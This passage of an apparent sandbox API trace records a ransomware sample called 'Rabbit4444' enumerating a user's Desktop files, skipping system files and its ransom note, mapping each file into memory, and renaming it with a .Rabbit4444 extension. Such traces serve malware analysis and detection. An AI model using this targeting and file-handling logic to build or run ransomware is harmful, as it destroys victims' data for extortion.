lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.194] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14150428440) returned 1 [0050.194] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0050.194] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0050.194] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.194] CloseHandle (hObject=0x298) returned 1 [0050.194] CloseHandle (hObject=0x278) returned 1 [0050.195] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\BZhPxLldD zvXbBb.bmp.Rabbit4444") returned 68 [0050.195] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\BZhPxLldD zvXbBb.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\bzhpxlldd zvxbbb.bmp"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\BZhPxLldD zvXbBb.bmp.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\bzhpxlldd zvxbbb.bmp.rabbit4444"), dwFlags=0x1) returned 1 [0050.196] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c11bcf0, ftCreationTime.dwHighDateTime=0x1d4cfdf, ftLastAccessTime.dwLowDateTime=0xa289ba90, ftLastAccessTime.dwHighDateTime=0x1d4d47e, ftLastWriteTime.dwLowDateTime=0xa289ba90, ftLastWriteTime.dwHighDateTime=0x1d4d47e, nFileSizeHigh=0x0, nFileSizeLow=0x1704a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fmLa.jpg", cAlternateFileName="")) returned 1 [0050.196] lstrcmpiW (lpString1="fmLa.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0050.196] lstrcmpiW (lpString1="fmLa.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.196] lstrcmpiW (lpString1="fmLa.jpg", lpString2="Rabbit4444.exe") returned -1 [0050.196] lstrcmpiW (lpString1="fmLa.jpg", lpString2=".") returned 1 [0050.196] lstrcmpiW (lpString1="fmLa.jpg", lpString2="..") returned 1 [0050.196] lstrcmpiW (lpString1="fmLa.jpg", lpString2="windows") returned -1 [0050.196] lstrcmpiW (lpString1="fmLa.jpg", lpString2="bootmgr") returned 1 [0050.196] lstrcmpiW (lpString1="fmLa.jpg", lpString2="pagefile.sys") returned -1 [0050.196] lstrcmpiW (lpString1="fmLa.jpg", lpString2="boot") returned 1 [0050.196] lstrcmpiW (lpString1="fmLa.jpg", lpString2="ids.txt") returned -1 [0050.196] lstrcmpiW (lpString1="fmLa.jpg", lpString2="NTUSER.DAT") returned -1 [0050.196] lstrcpyW (in: lpString1=0x130eb82, lpString2="fmLa.jpg" | out: lpString1="fmLa.jpg") returned="fmLa.jpg" [0050.196] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\fmLa.jpg", dwFileAttributes=0x0) returned 1 [0050.196] lstrlenW (lpString="fmLa.jpg") returned 8 [0050.196] lstrlenW (lpString="Rabbit4444") returned 10 [0050.196] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0050.196] lstrlenW (lpString=".dll") returned 4 [0050.196] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.196] lstrlenW (lpString=".lnk") returned 4 [0050.196] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0050.196] lstrlenW (lpString=".ini") returned 4 [0050.196] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0050.196] lstrlenW (lpString=".sys") returned 4 [0050.196] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0050.196] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\fmLa.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\fmla.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.197] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.197] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14150734542) returned 1 [0050.197] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=94282) returned 1 [0050.197] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0050.197] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0050.197] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x17350, lpName=0x0) returned 0x298 [0050.197] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x17350) returned 0x70000 [0050.199] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.199] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0050.199] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.199] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0050.199] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.199] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0050.199] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.199] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0050.199] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14151026758) returned 1 [0050.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0050.200] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0050.200] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.201] CloseHandle (hObject=0x298) returned 1 [0050.201] CloseHandle (hObject=0x278) returned 1 [0050.201] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\fmLa.jpg.Rabbit4444") returned 56 [0050.201] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\fmLa.jpg" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\fmla.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\fmLa.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\fmla.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0050.202] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf163bc90, ftCreationTime.dwHighDateTime=0x1d4c819, ftLastAccessTime.dwLowDateTime=0xb5d4aea0, ftLastAccessTime.dwHighDateTime=0x1d4d3db, ftLastWriteTime.dwLowDateTime=0xb5d4aea0, ftLastWriteTime.dwHighDateTime=0x1d4d3db, nFileSizeHigh=0x0, nFileSizeLow=0xcb5a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mh4EU.ots", cAlternateFileName="")) returned 1 [0050.202] lstrcmpiW (lpString1="mh4EU.ots", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.202] lstrcmpiW (lpString1="mh4EU.ots", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.202] lstrcmpiW (lpString1="mh4EU.ots", lpString2="Rabbit4444.exe") returned -1 [0050.202] lstrcmpiW (lpString1="mh4EU.ots", lpString2=".") returned 1 [0050.202] lstrcmpiW (lpString1="mh4EU.ots", lpString2="..") returned 1 [0050.202] lstrcmpiW (lpString1="mh4EU.ots", lpString2="windows") returned -1 [0050.202] lstrcmpiW (lpString1="mh4EU.ots", lpString2="bootmgr") returned 1 [0050.202] lstrcmpiW (lpString1="mh4EU.ots", lpString2="pagefile.sys") returned -1 [0050.202] lstrcmpiW (lpString1="mh4EU.ots", lpString2="boot") returned 1 [0050.202] lstrcmpiW (lpString1="mh4EU.ots", lpString2="ids.txt") returned 1 [0050.202] lstrcmpiW (lpString1="mh4EU.ots", lpString2="NTUSER.DAT") returned -1 [0050.202] lstrcpyW (in: lpString1=0x130eb82, lpString2="mh4EU.ots" | out: lpString1="mh4EU.ots") returned="mh4EU.ots" [0050.202] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\mh4EU.ots", dwFileAttributes=0x0) returned 1 [0050.202] lstrlenW (lpString="mh4EU.ots") returned 9 [0050.202] lstrlenW (lpString="Rabbit4444") returned 10 [0050.202] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0050.203] lstrlenW (lpString=".dll") returned 4 [0050.203] lstrcmpiW (lpString1=".ots", lpString2=".dll") returned 1 [0050.203] lstrlenW (lpString=".lnk") returned 4 [0050.203] lstrcmpiW (lpString1=".ots", lpString2=".lnk") returned 1 [0050.203] lstrlenW (lpString=".ini") returned 4 [0050.203] lstrcmpiW (lpString1=".ots", lpString2=".ini") returned 1 [0050.203] lstrlenW (lpString=".sys") returned 4 [0050.203] lstrcmpiW (lpString1=".ots", lpString2=".sys") returned -1 [0050.203] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\mh4EU.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\mh4eu.ots"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.203] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.203] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14151366277) returned 1 [0050.203] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=52058) returned 1 [0050.203] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0050.203] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0050.203] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xce60, lpName=0x0) returned 0x298 [0050.203] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xce60) returned 0x70000 [0050.204] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.205] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0050.205] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.205] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0050.205] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.205] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0050.205] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.205] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0050.205] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14151571568) returned 1 [0050.205] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0050.205] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0050.205] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.206] CloseHandle (hObject=0x298) returned 1 [0050.206] CloseHandle (hObject=0x278) returned 1 [0050.206] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\mh4EU.ots.Rabbit4444") returned 57 [0050.206] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\mh4EU.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\mh4eu.ots"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\mh4EU.ots.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\mh4eu.ots.rabbit4444"), dwFlags=0x1) returned 1 [0050.207] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44168620, ftCreationTime.dwHighDateTime=0x1d4cd33, ftLastAccessTime.dwLowDateTime=0x1b6da9c0, ftLastAccessTime.dwHighDateTime=0x1d4cfbc, ftLastWriteTime.dwLowDateTime=0x1b6da9c0, ftLastWriteTime.dwHighDateTime=0x1d4cfbc, nFileSizeHigh=0x0, nFileSizeLow=0xca6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p8YxsrELn8XKWAj6S.mp4", cAlternateFileName="P8YXSR~1.MP4")) returned 1 [0050.207] lstrcmpiW (lpString1="p8YxsrELn8XKWAj6S.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.207] lstrcmpiW (lpString1="p8YxsrELn8XKWAj6S.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.207] lstrcmpiW (lpString1="p8YxsrELn8XKWAj6S.mp4", lpString2="Rabbit4444.exe") returned -1 [0050.207] lstrcmpiW (lpString1="p8YxsrELn8XKWAj6S.mp4", lpString2=".") returned 1 [0050.207] lstrcmpiW (lpString1="p8YxsrELn8XKWAj6S.mp4", lpString2="..") returned 1 [0050.207] lstrcmpiW (lpString1="p8YxsrELn8XKWAj6S.mp4", lpString2="windows") returned -1 [0050.207] lstrcmpiW (lpString1="p8YxsrELn8XKWAj6S.mp4", lpString2="bootmgr") returned 1 [0050.207] lstrcmpiW (lpString1="p8YxsrELn8XKWAj6S.mp4", lpString2="pagefile.sys") returned -1 [0050.207] lstrcmpiW (lpString1="p8YxsrELn8XKWAj6S.mp4", lpString2="boot") returned 1 [0050.207] lstrcmpiW (lpString1="p8YxsrELn8XKWAj6S.mp4", lpString2="ids.txt") returned 1 [0050.207] lstrcmpiW (lpString1="p8YxsrELn8XKWAj6S.mp4", lpString2="NTUSER.DAT") returned 1 [0050.207] lstrcpyW (in: lpString1=0x130eb82, lpString2="p8YxsrELn8XKWAj6S.mp4" | out: lpString1="p8YxsrELn8XKWAj6S.mp4") returned="p8YxsrELn8XKWAj6S.mp4" [0050.207] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\p8YxsrELn8XKWAj6S.mp4", dwFileAttributes=0x0) returned 1 [0050.208] lstrlenW (lpString="p8YxsrELn8XKWAj6S.mp4") returned 21 [0050.208] lstrlenW (lpString="Rabbit4444") returned 10 [0050.208] lstrcmpiW (lpString1="KWAj6S.mp4", lpString2="Rabbit4444") returned -1 [0050.208] lstrlenW (lpString=".dll") returned 4 [0050.208] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0050.208] lstrlenW (lpString=".lnk") returned 4 [0050.208] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0050.208] lstrlenW (lpString=".ini") returned 4 [0050.208] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0050.208] lstrlenW (lpString=".sys") returned 4 [0050.208] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0050.208] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\p8YxsrELn8XKWAj6S.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\p8yxsreln8xkwaj6s.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.208] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.208] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14151872730) returned 1 [0050.208] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=3238) returned 1 [0050.208] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0050.208] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0050.208] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfb0, lpName=0x0) returned 0x298 [0050.208] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfb0) returned 0x70000 [0050.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0050.209] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0050.209] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.209] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0050.209] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.209] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0050.209] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14151982943) returned 1 [0050.209] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0050.209] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0050.209] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.209] CloseHandle (hObject=0x298) returned 1 [0050.209] CloseHandle (hObject=0x278) returned 1 [0050.210] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\p8YxsrELn8XKWAj6S.mp4.Rabbit4444") returned 69 [0050.210] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\p8YxsrELn8XKWAj6S.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\p8yxsreln8xkwaj6s.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\p8YxsrELn8XKWAj6S.mp4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\p8yxsreln8xkwaj6s.mp4.rabbit4444"), dwFlags=0x1) returned 1 [0050.210] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2309420, ftCreationTime.dwHighDateTime=0x1d4c8b6, ftLastAccessTime.dwLowDateTime=0x70c36970, ftLastAccessTime.dwHighDateTime=0x1d4cbb9, ftLastWriteTime.dwLowDateTime=0x70c36970, ftLastWriteTime.dwHighDateTime=0x1d4cbb9, nFileSizeHigh=0x0, nFileSizeLow=0x601c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qoUYKef.mp4", cAlternateFileName="")) returned 1 [0050.210] lstrcmpiW (lpString1="qoUYKef.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.210] lstrcmpiW (lpString1="qoUYKef.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.210] lstrcmpiW (lpString1="qoUYKef.mp4", lpString2="Rabbit4444.exe") returned -1 [0050.210] lstrcmpiW (lpString1="qoUYKef.mp4", lpString2=".") returned 1 [0050.211] lstrcmpiW (lpString1="qoUYKef.mp4", lpString2="..") returned 1 [0050.211] lstrcmpiW (lpString1="qoUYKef.mp4", lpString2="windows") returned -1 [0050.211] lstrcmpiW (lpString1="qoUYKef.mp4", lpString2="bootmgr") returned 1 [0050.211] lstrcmpiW (lpString1="qoUYKef.mp4", lpString2="pagefile.sys") returned 1 [0050.211] lstrcmpiW (lpString1="qoUYKef.mp4", lpString2="boot") returned 1 [0050.211] lstrcmpiW (lpString1="qoUYKef.mp4", lpString2="ids.txt") returned 1 [0050.211] lstrcmpiW (lpString1="qoUYKef.mp4", lpString2="NTUSER.DAT") returned 1 [0050.211] lstrcpyW (in: lpString1=0x130eb82, lpString2="qoUYKef.mp4" | out: lpString1="qoUYKef.mp4") returned="qoUYKef.mp4" [0050.211] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\qoUYKef.mp4", dwFileAttributes=0x0) returned 1 [0050.211] lstrlenW (lpString="qoUYKef.mp4") returned 11 [0050.211] lstrlenW (lpString="Rabbit4444") returned 10 [0050.211] lstrcmpiW (lpString1="oUYKef.mp4", lpString2="Rabbit4444") returned -1 [0050.211] lstrlenW (lpString=".dll") returned 4 [0050.211] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0050.211] lstrlenW (lpString=".lnk") returned 4 [0050.211] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0050.211] lstrlenW (lpString=".ini") returned 4 [0050.211] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0050.211] lstrlenW (lpString=".sys") returned 4 [0050.211] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0050.211] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\qoUYKef.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\qouykef.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.211] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.211] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14152214151) returned 1 [0050.211] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=24604) returned 1 [0050.211] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0050.212] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0050.212] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6320, lpName=0x0) returned 0x298 [0050.212] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6320) returned 0x70000 [0050.212] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.212] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0050.213] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.213] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0050.213] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.213] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0050.213] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.213] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0050.213] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14152368619) returned 1 [0050.213] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0050.213] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0050.213] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.213] CloseHandle (hObject=0x298) returned 1 [0050.213] CloseHandle (hObject=0x278) returned 1 [0050.215] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\qoUYKef.mp4.Rabbit4444") returned 59 [0050.215] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\qoUYKef.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\qouykef.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\qoUYKef.mp4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\desktop\\ulu8b2weqpro\\qouykef.mp4.rabbit4444"), dwFlags=0x1) returned 1 [0050.215] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ed30fb0, ftCreationTime.dwHighDateTime=0x1d4cb87, ftLastAccessTime.dwLowDateTime=0xfab8b4f0, ftLastAccessTime.dwHighDateTime=0x1d4c696, ftLastWriteTime.dwLowDateTime=0xfab8b4f0, ftLastWriteTime.dwHighDateTime=0x1d4c696, nFileSizeHigh=0x0, nFileSizeLow=0x9bd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qRf30E0va-Q5qcX8J.mp3", cAlternateFileName="QRF30E~1.MP3")) returned 1 [0050.215] lstrcmpiW (lpString1="qRf30E0va-Q5qcX8J.mp3", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.215] lstrcmpiW (lpString1="qRf30E0va-Q5qcX8J.mp3", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.215] lstrcmpiW (lpString1="qRf30E0va-Q5qcX8J.mp3", lpString2="Rabbit4444.exe") returned -1 [0050.215] lstrcmpiW (lpString1="qRf30E0va-Q5qcX8J.mp3", lpString2=".") returned 1 [0050.215] lstrcmpiW (lpString1="qRf30E0va-Q5qcX8J.mp3", lpString2="..") returned 1 [0050.215] lstrcmpiW (lpString1="qRf30E0va-Q5qcX8J.mp3", lpString2="windows") returned -1 [0050.215] lstrcmpiW (lpString1="qRf30E0va-Q5qcX8J.mp3", lpString2="bootmgr") returned 1 [0050.215] lstrcmpiW (lpString1="qRf30E0va-Q5qcX8J.mp3", lpString2="pagefile.sys") returned 1 [0050.215] lstrcmpiW (lpString1="qRf30E0va-Q5qcX8J.mp3", lpString2="boot") returned 1 [0050.215] lstrcmpiW (lpString1="qRf30E0va-Q5qcX8J.mp3", lpString2="ids.txt") returned 1 [0050.216] lstrcmpiW (lpString1="qRf30E0va-Q5qcX8J.mp3", lpString2="NTUSER.DAT") returned 1 [0050.216] lstrcpyW (in: lpString1=0x130eb82, lpString2="qRf30E0va-Q5qcX8J.mp3" | out: lpString1="qRf30E0va-Q5qcX8J.mp3") returned="qRf30E0va-Q5qcX8J.mp3" [0050.216] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\UlU8B2wEqPRo\\qRf30E0va-Q5qcX8J.mp3", 